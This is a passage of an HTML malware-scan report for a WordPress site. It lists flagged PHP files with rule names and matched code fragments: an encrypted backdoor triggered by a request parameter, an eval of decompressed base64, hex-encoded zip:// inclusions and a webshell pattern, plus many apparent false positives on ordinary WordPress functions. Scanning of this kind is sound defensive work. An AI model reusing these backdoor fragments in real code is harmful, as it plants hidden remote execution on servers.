</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">qcT</span><span style="color: #007700">(</span><span style="color: #0000BB">$KBxI</span><span style="color: #007700">) { </span><span style="color: #0000BB">$rxcET </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$hyCHB </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$rxcET</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$JUyTQ </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$KBxI</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$JUyTQ</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$rxcET</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$hyCHB</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">qcT</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'WZ22bGaucU+YLFeMLJRkJ+z8YCAb</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$qcT</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$qcT</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_55").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/library/SimplePie/Cache/Cache/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 67.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_56" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"VkxnTkF4cHJoVGt1WlJuQi5mbHY"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_56").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/src/Parse/Parse/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 366.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_57" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$n</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x66\x34\x76\x5f\x36\x39\x37\x37\x30\x63\x61\x37\x38\x64\x63\x66\x32\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x37\x30\x63\x61\x37\x38\x64\x63\x66\x32\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_57").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/src/Parse/Parse/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 408.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_58" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$n</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$n</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">$n</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_58").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/src/HTTP/HTTP/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 375.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:55</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_59" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$qNk</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6d\x70\x33\x5f\x36\x39\x37\x38\x37\x33\x66\x66\x30\x39\x64\x33\x63\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x33\x66\x66\x30\x39\x64\x33\x63\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_59").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/SimplePie/src/HTTP/HTTP/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 423.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:55</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_60" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$qNk</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_60").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/general-template.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 168.57 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 14:16:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 243</span><br><table id="file_61" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$settings</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1005</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_icon_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$size </span><span style="color: #007700">= </span><span style="color: #0000BB">512</span><span style="color: #007700">, </span><span style="color: #0000BB">$url </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the site has a site icon </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1017</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_site_icon</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">get_site_icon_url</span><span style="color: #007700">( </span><span style="color: #0000BB">512</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the site has a custom logo </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_custom_logo</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1044</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_image</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a custom logo</span><span style="color: #007700">, </span><span style="color: #0000BB">linked to home unless the theme supports removing the link on the home page</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Custom logo markup</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_custom_logo</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_custom_logo'</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_sidebar</span><span style="color: #007700">( </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_custom_logo</span><span style="color: #007700">( </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns document title </span><span style="color: #007700">for </span><span style="color: #0000BB">the current page</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1174</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Tag with the document title</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_document_title</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1182</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning that value instead</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$title</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_render_title_tag</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void String when </span><span style="color: #007700">`</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">is false</span><span style="color: #007700">, </span><span style="color: #0000BB">nothing otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$sep </span><span style="color: #007700">= </span><span style="color: #DD0000">'&raquo;'</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$seplocation </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void Title when retrieving</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_post_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. </span><span style="color: #0000BB">$title</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1518</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void Title when retrieving</span><span style="color: #007700">, </span><span style="color: #0000BB">null when displaying </span><span style="color: #007700">or </span><span style="color: #0000BB">failure</span><span style="color: #007700">.</span>
</span>
